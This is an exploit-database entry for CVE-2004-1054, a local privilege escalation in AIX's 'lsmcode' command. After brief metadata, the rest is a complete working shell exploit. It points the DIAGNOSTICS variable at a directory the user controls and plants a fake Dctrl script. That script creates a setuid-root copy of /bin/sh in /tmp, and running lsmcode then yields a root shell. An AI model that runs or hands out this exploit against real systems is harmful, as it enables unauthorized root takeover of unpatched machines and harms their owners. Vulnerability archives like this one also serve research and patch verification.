[] NeoSense

AIX 4.3/5.1 < 5.3 - 'lsmcode' Execution Privilege Escalation

Author: cees-bart
type: local
platform: aix
port: nan
date_added: 2004-12-20 
date_updated: 2017-01-30 
verified: 1 
codes: OSVDB-12616;CVE-2004-1054 
tags: 
aliases:  
screenshot_url:  
application_url: 

mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh

# milw0rm.com [2004-12-21]